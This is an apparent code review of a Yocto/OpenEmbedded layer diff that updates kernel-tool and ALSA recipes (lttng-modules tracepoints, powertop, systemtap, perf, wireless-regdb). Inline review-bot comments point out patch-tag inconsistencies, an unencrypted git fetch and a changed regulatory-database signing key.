++ ctf_integer(char, sync_commit, commit_transaction->t_synchronous_commit)
++ ctf_integer(tid_t, transaction, commit_transaction->t_tid)
++ )
++)
++#else
+ LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit,
+
+ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
+@@ -41,6 +60,7 @@ LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit
+ ctf_integer(int, transaction, commit_transaction->t_tid)
+ )
+ )
++#endif
+
+ LTTNG_TRACEPOINT_EVENT_INSTANCE(jbd2_commit, jbd2_start_commit,
+
+@@ -79,6 +99,25 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(jbd2_com
+ )
+ #endif
+
++#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
++ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
++ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
++ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
++ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
++ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
++LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
++ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
++
++ TP_ARGS(journal, commit_transaction),
++
++ TP_FIELDS(
++ ctf_integer(dev_t, dev, journal->j_fs_dev->bd_dev)
++ ctf_integer(char, sync_commit, commit_transaction->t_synchronous_commit)
++ ctf_integer(tid_t, transaction, commit_transaction->t_tid)
++ ctf_integer(tid_t, head, journal->j_tail_sequence)
++ )
++)
++#else
+ LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
+ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
+
+@@ -91,6 +130,7 @@ LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
+ ctf_integer(int, head, journal->j_tail_sequence)
+ )
+ )
++#endif
+
+ LTTNG_TRACEPOINT_EVENT(jbd2_submit_inode_data,
+ TP_PROTO(struct inode *inode),
+@@ -103,7 +143,48 @@ LTTNG_TRACEPOINT_EVENT(jbd2_submit_inode
+ )
+ )
+
+-#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(2,6,32))
++#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
++ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
++ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
++ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
++ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
++ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
++LTTNG_TRACEPOINT_EVENT(jbd2_run_stats,
++ TP_PROTO(dev_t dev, tid_t tid,
++ struct transaction_run_stats_s *stats),
++
++ TP_ARGS(dev, tid, stats),
++
++ TP_FIELDS(
++ ctf_integer(dev_t, dev, dev)
++ ctf_integer(tid_t, tid, tid)
++ ctf_integer(unsigned long, wait, stats->rs_wait)
++ ctf_integer(unsigned long, running, stats->rs_running)
++ ctf_integer(unsigned long, locked, stats->rs_locked)
++ ctf_integer(unsigned long, flushing, stats->rs_flushing)
++ ctf_integer(unsigned long, logging, stats->rs_logging)
++ ctf_integer(__u32, handle_count, stats->rs_handle_count)
++ ctf_integer(__u32, blocks, stats->rs_blocks)
++ ctf_integer(__u32, blocks_logged, stats->rs_blocks_logged)
++ )
++)
++
++LTTNG_TRACEPOINT_EVENT(jbd2_checkpoint_stats,
++ TP_PROTO(dev_t dev, tid_t tid,
++ struct transaction_chp_stats_s *stats),
++
++ TP_ARGS(dev, tid, stats),
++
++ TP_FIELDS(
++ ctf_integer(dev_t, dev, dev)
++ ctf_integer(tid_t, tid, tid)
++ ctf_integer(unsigned long, chp_time, stats->cs_chp_time)
++ ctf_integer(__u32, forced_to_close, stats->cs_forced_to_close)
++ ctf_integer(__u32, written, stats->cs_written)
++ ctf_integer(__u32, dropped, stats->cs_dropped)
++ )
++)
++#else
+ LTTNG_TRACEPOINT_EVENT(jbd2_run_stats,
+ TP_PROTO(dev_t dev, unsigned long tid,
+ struct transaction_run_stats_s *stats),
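Review bot: The patch header spells the tag `Upstream-status: Backport`, with a lower-case "s" and no commit reference, whereas the other lttng-modules patches added in this diff use `Upstream-Status: Backport [<commit>]`. Tooling that matches the tag case-sensitively may not recognise this patch as a backport, which makes its provenance harder to audit. The three upstream commits are already listed as URLs just below, so folding them into the tag is enough: `Upstream-Status: Backport [b28830a0dcdf, 4fd2615b87b3, 612c99eb24bf]`. The header also lacks the `From:`/`Subject:` lines that the numbered patches carry.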
diff --git a/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb b/meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb
index a38d8afb7a..8e9c44241b 100644
--- a/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb
+++ b/meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb
@@ -1,6 +1,7 @@
SECTION = "devel"
SUMMARY = "Linux Trace Toolkit KERNEL MODULE"
DESCRIPTION = "The lttng-modules 2.0 package contains the kernel tracer modules"
+HOMEPAGE = "https://lttng.org/"
LICENSE = "LGPLv2.1 & GPLv2 & MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=3f882d431dc0f32f1f44c0707aa41128"
@@ -11,10 +12,14 @@ COMPATIBLE_HOST = '(x86_64|i.86|powerpc|aarch64|mips|nios2|arm|riscv).*-linux'
SRC_URI = "https://lttng.org/files/${BPN}/${BPN}-${PV}.tar.bz2 \
file://Makefile-Do-not-fail-if-CONFIG_TRACEPOINTS-is-not-en.patch \
file://BUILD_RUNTIME_BUG_ON-vs-gcc7.patch \
+ file://0017-fix-random-remove-unused-tracepoints-v5.18.patch \
+ file://0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch \
+ file://0019-fix-random-tracepoints-removed-in-stable-kernels.patch \
+ file://fix-jbd2-use-the-correct-print-format.patch \
"
-SRC_URI[md5sum] = "8ef09fdfcdec669d33f7fc1c1c80f2c4"
-SRC_URI[sha256sum] = "23372811cdcd2ac28ba8c9d09484ed5f9238cfbd0043f8c663ff3875ba9c8566"
+SRC_URI[md5sum] = "cfb23ea6bdaf1ad40c7f9ac098b4016d"
+SRC_URI[sha256sum] = "0c5fe9f8d8dbd1411a3c1c643dcbd0a55577bd15845758b73948e00bc7c387a6"
export INSTALL_MOD_DIR="kernel/lttng-modules"
@@ -22,7 +27,9 @@ EXTRA_OEMAKE += "KERNELDIR='${STAGING_KERNEL_DIR}'"
do_install_append() {
# Delete empty directories to avoid QA failures if no modules were built
- find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \;
+ if [ -d ${D}/${nonarch_base_libdir} ]; then
+ find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \;
+ fi
}
python do_package_prepend() {
diff --git a/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb b/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
index a969fffd62..6306193809 100644
--- a/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
+++ b/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
@@ -3,13 +3,14 @@ SUMMARY = "Linux Trace Toolkit Control"
DESCRIPTION = "The Linux trace toolkit is a suite of tools designed \
to extract program execution details from the Linux operating system \
and interpret them."
+HOMEPAGE = "https://github.com/lttng/lttng-tools"
LICENSE = "GPLv2 & LGPLv2.1"
LIC_FILES_CHKSUM = "file://LICENSE;md5=01d7fc4496aacf37d90df90b90b0cac1 \
file://gpl-2.0.txt;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
file://lgpl-2.1.txt;md5=0f0d71500e6a57fd24d825f33242b9ca"
-DEPENDS = "liburcu popt libxml2 util-linux"
+DEPENDS = "liburcu popt libxml2 util-linux bison-native"
RDEPENDS_${PN} = "libgcc"
RDEPENDS_${PN}-ptest += "make perl bash gawk babeltrace procps perl-module-overloading coreutils util-linux kmod lttng-modules sed python3-core"
RDEPENDS_${PN}-ptest_append_libc-glibc = " glibc-utils"
diff --git a/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb b/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
index c7edb20ee4..32b89bb5ea 100644
--- a/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
+++ b/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
@@ -1,8 +1,9 @@
SUMMARY = "Build tools needed by external modules"
+HOMEPAGE = "https://www.yoctoproject.org/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/files/common-licenses/GPL-2.0;md5=801f80980d171dd6425610833a22dbe6"
-inherit kernel-arch
+inherit kernel-arch linux-kernel-base
inherit pkgconfig
PACKAGE_ARCH = "${MACHINE_ARCH}"
@@ -15,8 +16,10 @@ do_compile[depends] += "virtual/kernel:do_compile_kernelmodules"
RDEPENDS_${PN}-dev = ""
DEPENDS += "bc-native bison-native"
+DEPENDS += "gmp-native"
EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}""
+EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}" CROSS_COMPILE=${TARGET_PREFIX}"
# Build some host tools under work-shared. CC, LD, and AR are probably
# not used, but this is the historical way of invoking "make scripts".
diff --git a/meta/recipes-kernel/modutils-initscripts/files/modutils.sh b/meta/recipes-kernel/modutils-initscripts/files/modutils.sh
index a78adf5729..df37bfe7a1 100755
--- a/meta/recipes-kernel/modutils-initscripts/files/modutils.sh
+++ b/meta/recipes-kernel/modutils-initscripts/files/modutils.sh
@@ -18,7 +18,7 @@ LOAD_MODULE=modprobe
if [ ! -f /lib/modules/`uname -r`/modules.dep ]; then
[ "$VERBOSE" != no ] && echo "Calculating module dependencies ..."
- depmod -Ae
+ depmod -a
fi
loaded_modules=" "
diff --git a/meta/recipes-kernel/perf/perf.bb b/meta/recipes-kernel/perf/perf.bb
index 578b871e9e..42621e47d3 100644
--- a/meta/recipes-kernel/perf/perf.bb
+++ b/meta/recipes-kernel/perf/perf.bb
@@ -9,11 +9,11 @@ HOMEPAGE = "https://perf.wiki.kernel.org/index.php/Main_Page"
LICENSE = "GPLv2"
-PR = "r9"
+PR = "r10"
PACKAGECONFIG ??= "scripting tui libunwind"
PACKAGECONFIG[dwarf] = ",NO_DWARF=1"
-PACKAGECONFIG[scripting] = ",NO_LIBPERL=1 NO_LIBPYTHON=1,perl python3"
+PACKAGECONFIG[scripting] = ",NO_LIBPERL=1 NO_LIBPYTHON=1,perl python3 python3-setuptools-native"
# gui support was added with kernel 3.6.35
# since 3.10 libnewt was replaced by slang
# to cover a wide range of kernel we add both dependencies
@@ -45,7 +45,7 @@ PROVIDES = "virtual/perf"
inherit linux-kernel-base kernel-arch manpages
# needed for building the tools/perf Python bindings
-inherit ${@bb.utils.contains('PACKAGECONFIG', 'scripting', 'python3native', '', d)}
+inherit ${@bb.utils.contains('PACKAGECONFIG', 'scripting', 'python3targetconfig', '', d)}
inherit python3-dir
export PYTHON_SITEPACKAGES_DIR
@@ -265,9 +265,9 @@ PACKAGES =+ "${PN}-archive ${PN}-tests ${PN}-perl ${PN}-python"
RDEPENDS_${PN} += "elfutils bash"
RDEPENDS_${PN}-archive =+ "bash"
-RDEPENDS_${PN}-python =+ "bash python3 python3-modules ${@bb.utils.contains('PACKAGECONFIG', 'audit', 'audit-python3', '', d)}"
+RDEPENDS_${PN}-python =+ "bash python3 python3-modules ${@bb.utils.contains('PACKAGECONFIG', 'audit', 'audit-python', '', d)}"
RDEPENDS_${PN}-perl =+ "bash perl perl-modules"
-RDEPENDS_${PN}-tests =+ "python3"
+RDEPENDS_${PN}-tests =+ "python3 bash"
RSUGGESTS_SCRIPTING = "${@bb.utils.contains('PACKAGECONFIG', 'scripting', '${PN}-perl ${PN}-python', '',d)}"
RSUGGESTS_${PN} += "${PN}-archive ${PN}-tests ${RSUGGESTS_SCRIPTING}"
diff --git a/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch b/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch
new file mode 100644
index 0000000000..4ccbdbfcd1
--- /dev/null
+++ b/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch
@@ -0,0 +1,70 @@
+From 0d833743954ac1c58773cbf7a78fe0dc8105ae4a Mon Sep 17 00:00:00 2001
+From: Joe Konno <joe.konno@linux.intel.com>
+Date: Tue, 11 Feb 2020 14:15:42 -0800
+Subject: [PATCH] configure.ac: ax_add_fortify_source
+
+Use a maintained autoconf-archive macro to determine whether we need to
+add -D_FORTIFY_SOURCE=3D2, or if the underlying OS (or toolchain) has it
+baked in.
+
+Signed-off-by: Joe Konno <joe.konno@intel.com>
+
+Fixes:
+ aclocal: error: too many loops
+
+Upstream-Status: Backport from 2.12
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
+---
+ configure.ac | 2 +-
+ m4/gcc_fortify_source_cc.m4 | 29 -----------------------------
+ 2 files changed, 1 insertion(+), 30 deletions(-)
+ delete mode 100644 m4/gcc_fortify_source_cc.m4
+
+diff --git a/configure.ac b/configure.ac
+index d6a15e1..d68369c 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -36,7 +36,7 @@ AC_PROG_LIBTOOL
+ AC_PROG_CC
+ AC_PROG_INSTALL
+ AM_PROG_CC_C_O
+-GCC_FORTIFY_SOURCE_CC
++AX_ADD_FORTIFY_SOURCE
+ AX_CXX_COMPILE_STDCXX_11([noext], [mandatory])
+
+ # Checks for libraries.
+diff --git a/m4/gcc_fortify_source_cc.m4 b/m4/gcc_fortify_source_cc.m4
+deleted file mode 100644
+index 1206672..0000000
+--- a/m4/gcc_fortify_source_cc.m4
++++ /dev/null
+@@ -1,29 +0,0 @@
+-dnl GCC_FORTIFY_SOURCE_CC
+-dnl checks -D_FORTIFY_SOURCE with the C++ compiler, if it exists then
+-dnl updates CXXCPP
+-AC_DEFUN([GCC_FORTIFY_SOURCE_CC],[
+- AC_LANG_ASSERT([C++])
+- AS_IF([test "X$CXX" != "X"], [
+- AC_MSG_CHECKING([for FORTIFY_SOURCE support])
+- fs_old_cxxcpp="$CXXCPP"
+- fs_old_cxxflags="$CXXFLAGS"
+- CXXCPP="$CXXCPP -D_FORTIFY_SOURCE=2"
+- CXXFLAGS="$CXXFLAGS -Werror"
+- AC_COMPILE_IFELSE([
+- AC_LANG_PROGRAM([[]], [[
+- int main(void) {
+- #if !(__GNUC_PREREQ (4, 1) )
+- #error No FORTIFY_SOURCE support
+- #endif
+- return 0;
+- }
+- ]], [
+- AC_MSG_RESULT([yes])
+- ], [
+- AC_MSG_RESULT([no])
+- CXXCPP="$fs_old_cxxcpp"
+- ])
+- ])
+- CXXFLAGS="$fs_old_cxxflags"
+- ])
+-])
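Review bot: The commit message in this patch reads `-D_FORTIFY_SOURCE=3D2`, which is quoted-printable residue from a mail export; the flag meant is `-D_FORTIFY_SOURCE=2`, as the deleted macro shows. The text should be corrected so that nobody reads it as a level-3 setting. The tag `Upstream-Status: Backport from 2.12` names no commit, and 0003 has the same gap with `Backport from tip`; a bracketed commit id or URL (`Upstream-Status: Backport [<upstream commit>]`) would make both traceable. After this change the hardening define depends on `AX_ADD_FORTIFY_SOURCE` from autoconf-archive being expanded. It is therefore worth confirming once in the compile log that the flag still reaches the compiler.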
diff --git a/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch b/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch
new file mode 100644
index 0000000000..ac728f4a39
--- /dev/null
+++ b/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch
@@ -0,0 +1,29 @@
+From fbf74492236676e844b021b0dbb45b1ca43a0410 Mon Sep 17 00:00:00 2001
+From: David King <amigadave@amigadave.com>
+Date: Thu, 15 Apr 2021 11:45:13 +0100
+Subject: [PATCH] configure: Use AX_REQUIRE_DEFINED
+
+Require additional macros to be defined early, to avoid an aclocal
+"too many loops" error when copying macros.
+
+Upstream-Status: Backport from tip
+
+Signed-off-by: Tim Orling <ticotimo@gmail.com>
+---
+ configure.ac | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/configure.ac b/configure.ac
+index d68369c..b90831b 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -29,6 +29,9 @@ AM_GNU_GETTEXT([external])
+ AM_GNU_GETTEXT_VERSION([0.18.2])
+
+ m4_ifdef([AM_PROG_AR], [AM_PROG_AR])
++AX_REQUIRE_DEFINED([AX_ADD_FORTIFY_SOURCE])
++AX_REQUIRE_DEFINED([AX_CXX_COMPILE_STDCXX])
++AX_REQUIRE_DEFINED([AX_PTHREAD])
+ # Checks for programs.
+ AC_PROG_CPP
+ AC_PROG_CXX
diff --git a/meta/recipes-kernel/powertop/powertop_2.10.bb b/meta/recipes-kernel/powertop/powertop_2.10.bb
index f1b0e92b2b..dcbba2fd5c 100644
--- a/meta/recipes-kernel/powertop/powertop_2.10.bb
+++ b/meta/recipes-kernel/powertop/powertop_2.10.bb
@@ -2,13 +2,15 @@ SUMMARY = "Power usage tool"
DESCRIPTION = "Linux tool to diagnose issues with power consumption and power management."
HOMEPAGE = "https://01.org/powertop/"
BUGTRACKER = "https://app.devzing.com/powertopbugs/bugzilla"
-DEPENDS = "ncurses libnl pciutils"
+DEPENDS = "ncurses libnl pciutils autoconf-archive"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e"
-SRC_URI = "git://github.com/fenrus75/powertop;protocol=https \
- file://0001-wakeup_xxx.h-include-limits.h.patch \
-"
+SRC_URI = "git://github.com/fenrus75/powertop;protocol=https;branch=master \
+ file://0001-wakeup_xxx.h-include-limits.h.patch \
+ file://0002-configure.ac-ax_add_fortify_source.patch \
+ file://0003-configure-Use-AX_REQUIRE_DEFINED.patch \
+ "
SRCREV = "e8765b5475b22b7a2b6e9e8a031c68a268a0b0b3"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb b/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
index 46820ef489..6ee0be5e3e 100644
--- a/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
+++ b/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
@@ -1,5 +1,5 @@
SUMMARY = "UProbes kernel module for SystemTap"
-
+HOMEPAGE = "https://sourceware.org/systemtap/"
require systemtap_git.inc
DEPENDS = "systemtap virtual/kernel"
diff --git a/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch b/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch
new file mode 100644
index 0000000000..f885c44460
--- /dev/null
+++ b/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch
@@ -0,0 +1,49 @@
+From f199d1982ef8a6c6d5c06c082d057b8793bcc6aa Mon Sep 17 00:00:00 2001
+From: Serhei Makarov <serhei@serhei.io>
+Date: Fri, 21 Jan 2022 18:21:46 -0500
+Subject: [PATCH] gcc12 c++ compatibility re-tweak for rhel6: use function
+ pointer instead of lambdas instead of ptr_fun<>
+
+Saving 2 lines in ltrim/rtrim is probably not a good reason to drop
+compatibility with the RHEL6 system compiler. Actually declaring a
+named function and passing the function pointer is compatible with
+everything.
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=systemtap.git;a=commit;h=f199d1982ef8a6c6d5c06c082d057b8793bcc6aa]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ util.cxx | 13 ++++++++-----
+ 1 file changed, 8 insertions(+), 5 deletions(-)
+
+--- a/util.cxx
++++ b/util.cxx
+@@ -1757,21 +1757,24 @@ flush_to_stream (const string &fname, os
+ return 1; // Failure
+ }
+
++int
++not_isspace(unsigned char c)
++{
++ return !std::isspace(c);
++}
++
+ // trim from start (in place)
+ void
+ ltrim(std::string &s)
+ {
+- s.erase(s.begin(),
+- std::find_if(s.begin(), s.end(),
+- std::not1(std::ptr_fun<int, int>(std::isspace))));
++ s.erase(s.begin(), std::find_if(s.begin(), s.end(), not_isspace));
+ }
+
+ // trim from end (in place)
+ void
+ rtrim(std::string &s)
+ {
+- s.erase(std::find_if(s.rbegin(), s.rend(),
+- std::not1(std::ptr_fun<int, int>(std::isspace))).base(), s.end());
++ s.erase(std::find_if(s.rbegin(), s.rend(), not_isspace).base(), s.end());
+ }
+
+ // trim from both ends (in place)
diff --git a/meta/recipes-kernel/systemtap/systemtap_git.bb b/meta/recipes-kernel/systemtap/systemtap_git.bb
index 1c9f2aed16..a8b2cf1eac 100644
--- a/meta/recipes-kernel/systemtap/systemtap_git.bb
+++ b/meta/recipes-kernel/systemtap/systemtap_git.bb
@@ -1,9 +1,14 @@
SUMMARY = "Script-directed dynamic tracing and performance analysis tool for Linux"
+DESCRIPTION = "It provides free software infrastructure to simplify the \
+gathering of information about the running Linux system. This assists \
+diagnosis of a performance or functional problem."
HOMEPAGE = "https://sourceware.org/systemtap/"
require systemtap_git.inc
-SRC_URI += "file://0001-improve-reproducibility-for-c-compiling.patch"
+SRC_URI += "file://0001-improve-reproducibility-for-c-compiling.patch \
+ file://0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch \
+ "
DEPENDS = "elfutils"
diff --git a/meta/recipes-kernel/systemtap/systemtap_git.inc b/meta/recipes-kernel/systemtap/systemtap_git.inc
index 116e83fe0f..af55f15fd4 100644
--- a/meta/recipes-kernel/systemtap/systemtap_git.inc
+++ b/meta/recipes-kernel/systemtap/systemtap_git.inc
@@ -3,7 +3,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
SRCREV = "044a0640985ef007c0b2fb6eaf660d9d51800cda"
PV = "4.2"
-SRC_URI = "git://sourceware.org/git/systemtap.git \
+SRC_URI = "git://sourceware.org/git/systemtap.git;branch=master \
file://0001-Do-not-let-configure-write-a-python-location-into-th.patch \
file://0001-Install-python-modules-to-correct-library-dir.patch \
file://0001-staprun-stapbpf-don-t-support-installing-a-non-root.patch \
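Review bot: The rewritten `SRC_URI` line adds `branch=master` but still has no `protocol=` parameter, so the fetch presumably falls back to the plain git protocol, which has no transport encryption or server authentication. The powertop recipe touched in this same commit already passes `protocol=https`. The pinned `SRCREV` limits what a tampered transport could deliver, but an authenticated transport is the safer default: `SRC_URI = "git://sourceware.org/git/systemtap.git;branch=master;protocol=https \`. The SRC_URI list continues past the end of this hunk.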
diff --git a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.04.29.bb b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb
index 30d4cb523f..6489bc90d9 100644
--- a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.04.29.bb
+++ b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb
@@ -5,7 +5,7 @@ LICENSE = "ISC"
LIC_FILES_CHKSUM = "file://LICENSE;md5=07c4f6dea3845b02a18dc00c8c87699c"
SRC_URI = "https://www.kernel.org/pub/software/network/${BPN}/${BP}.tar.xz"
-SRC_URI[sha256sum] = "89fd031aed5977c219a71501e144375a10e7c90d1005d5d086ea7972886a2c7a"
+SRC_URI[sha256sum] = "c8a61c9acf76fa7eb4239e89f640dee3e87098d9f69b4d3518c9c60fc6d20c55"
inherit bin_package allarch
@@ -13,7 +13,7 @@ do_install() {
install -d -m0755 ${D}${nonarch_libdir}/crda
install -d -m0755 ${D}${sysconfdir}/wireless-regdb/pubkeys
install -m 0644 regulatory.bin ${D}${nonarch_libdir}/crda/regulatory.bin
- install -m 0644 sforshee.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/sforshee.key.pub.pem
+ install -m 0644 wens.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/wens.key.pub.pem
install -m 0644 -D regulatory.db ${D}${nonarch_base_libdir}/firmware/regulatory.db
install -m 0644 regulatory.db.p7s ${D}${nonarch_base_libdir}/firmware/regulatory.db.p7s
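Review bot: The installed public key changes from `sforshee.key.pub.pem` to `wens.key.pub.pem`, which suggests that `regulatory.db.p7s` in this release is signed with a different key, and nothing in the recipe records that. A kernel that checks the regdb signature against its built-in certificates would presumably reject the new database unless it also carries the matching certificate, so this should be checked against the kernels shipped with this layer. I would add a comment above the install line, for example `# regulatory.db.p7s is signed with the wens key from this release on; kernels enforcing signed regdb need the matching certificate`. `do_install` starts and ends outside this hunk.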
diff --git a/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb b/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
index e2bc61fbe9..4867c798b9 100644
--- a/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
+++ b/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
@@ -1,4 +1,6 @@
SUMMARY = "ALSA sound library"
+DESCRIPTION = "(Occasionally a.k.a. libasound) is a userspace library that \
+provides a level of abstraction over the /dev interfaces provided by the kernel modules."
HOMEPAGE = "http://www.alsa-project.org"
BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
SECTION = "libs/multimedia"
diff --git a/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
index 61d394b0f0..8205982fcc 100644
--- a/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
@@ -1,4 +1,7 @@
SUMMARY = "ALSA Plugins"
+DESCRIPTION = "Used to create virtual devices that can be used like normal \
+hardware devices but cause extra processing of the sound stream to take place. \
+They are used while configuring ALSA in the .asoundrc file."
HOMEPAGE = "http://alsa-project.org"
BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
SECTION = "multimedia"
@@ -33,7 +36,7 @@ PACKAGECONFIG ??= "\
speexdsp \
${@bb.utils.filter('DISTRO_FEATURES', 'pulseaudio', d)} \
"
-PACKAGECONFIG[aaf] = "--enable-aaf,--disable-aaf,avtp"
+PACKAGECONFIG[aaf] = "--enable-aaf,--disable-aaf,libavtp"
PACKAGECONFIG[jack] = "--enable-jack,--disable-jack,jack"
PACKAGECONFIG[libav] = "--enable-libav,--disable-libav,libav"
PACKAGECONFIG[maemo-plugin] = "--enable-maemo-plugin,--disable-maemo-plugin"
diff --git a/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb b/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
index c1f4acdb03..c979d7642e 100644
--- a/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
+++ b/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
@@ -1,4 +1,7 @@
SUMMARY = "Advanced tools for certain ALSA sound card drivers"
+DESCRIPTION = "Package containing a number of tools ranging from envy24control \
+which provides complete control over all devices with an envy24 chip, to \
+firmware loaders for pcmcia, USB and the hdsp devices."
HOMEPAGE = "http://www.alsa-project.org"
BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
SECTION = "console/utils"
diff --git a/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
index 5101cc7b7a..2ff5494c99 100644
--- a/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
@@ -1,4 +1,7 @@
SUMMARY = "ALSA topology configuration files"
+DESCRIPTION = "Provides a method for audio drivers to load their mixers, \
+routing, PCMs and capabilities from user space at runtime without changing \
+any driver source code."
HOMEPAGE = "https://alsa-project.org"
BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking"
LICENSE = "BSD-3-Clause"
diff --git a/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb b/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
index a432d5de07..ee1688b421 100644
--- a/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
+++ b/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
@@ -1,4 +1,7 @@
SUMMARY = "ALSA Use Case Manager configuration"
+DESCRIPTION = "This package contains ALSA Use Case Manager configuration \
+of audio input/output names and routing for specific audio hardware. \
+They can be used with the alsaucm tool. "
HOMEPAGE = "https://alsa-project.org"
BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking"
LICENSE = "BSD-3-Clause"
diff --git a/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
index 1dc30f377b..54aa2f9544 100644
--- a/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
@@ -1,4 +1,6 @@
SUMMARY = "ALSA sound utilities"
+DESCRIPTION = "collection of small and often extremely powerful applications \
+designed to allow users to control the various parts of the ALSA system."
HOMEPAGE = "http://www.alsa-project.org"
BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
SECTION = "console/utils"
